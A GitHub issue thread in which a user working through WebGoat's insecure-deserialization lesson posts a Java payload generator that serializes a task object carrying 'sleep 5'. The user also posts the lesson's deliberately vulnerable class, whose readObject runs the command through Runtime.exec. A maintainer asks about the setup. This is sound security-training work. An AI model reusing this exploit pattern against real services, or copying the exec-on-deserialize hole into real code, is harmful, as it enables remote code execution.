The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again.

[chimcanhcutbietnoi]

I'm running Webgoat on my virtual machine and already synchronizing the time of the virtual server with the time of my host machine. But I keep receiving the message saying "The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again."
This is my Main.java:

import java.io.*;
import java.util.*;
import java.time.*;
import  org.dummy.insecure.framework.VulnerableTaskHolder;

public class Main{
	public static void main(String[] args) throws FileNotFoundException,IOException,ClassNotFoundException{
		VulnerableTaskHolder go = new VulnerableTaskHolder("penguin", "sleep 5");

		ByteArrayOutputStream bos = new ByteArrayOutputStream();
		ObjectOutputStream oos = new ObjectOutputStream(bos);
		oos.writeObject(go);
		oos.flush();
        System.out.println(Base64.getEncoder().encodeToString(bos.toByteArray()));
	}
}

This is VulnerableTaskHolder.java:

package org.dummy.insecure.framework;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.time.LocalDateTime;
import java.time.Instant;
//import lombok.extern.slf4j.Slf4j;

//@Slf4j
// TODO move back to lesson
public class VulnerableTaskHolder implements Serializable {

  private static final long serialVersionUID = 2;

  private String taskName;
  private String taskAction;
  private LocalDateTime requestedExecutionTime;

  public VulnerableTaskHolder(String taskName, String taskAction) {
    super();
    this.taskName = taskName;
    this.taskAction = taskAction;
    this.requestedExecutionTime = LocalDateTime.now().plusSeconds(2);
  }

  @Override
  public String toString() {
    return "VulnerableTaskHolder [taskName="
        + taskName
        + ", taskAction="
        + taskAction
        + ", requestedExecutionTime="
        + requestedExecutionTime
        + "]";
  }

  /**
   * Execute a task when de-serializing a saved or received object.
   *
   * @author stupid develop
   */
  private void readObject(ObjectInputStream stream) throws Exception {
    // unserialize data so taskName and taskAction are available
    stream.defaultReadObject();

    // do something with the data
    //log.info("restoring task: {}", taskName);
    //log.info("restoring time: {}", requestedExecutionTime);

    if (requestedExecutionTime != null
        && (requestedExecutionTime.isBefore(LocalDateTime.now())
            || requestedExecutionTime.isAfter(LocalDateTime.now()))) {
      // do nothing is the time is not within 10 minutes after the object has been created
      //log.debug(this.toString());
      throw new IllegalArgumentException("outdated");
    }

    // condition is here to prevent you from destroying the goat altogether
    if ((taskAction.startsWith("sleep") || taskAction.startsWith("ping"))
        && taskAction.length() < 22) {
      //log.info("about to execute: {}", taskAction);
      try {
        Process p = Runtime.getRuntime().exec(taskAction);
        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line = null;
        while ((line = in.readLine()) != null) {
          //log.info(line);
        }
      } catch (IOException e) {
        //log.error("IO Exception", e);
      }
    }
  }
}

[github-actions]

Thanks for submitting your first issue, we will have a look as quickly as possible.

[zubcevic]

Is WebGoat running as a java appllication on the same host or is if running remotely or in some container context?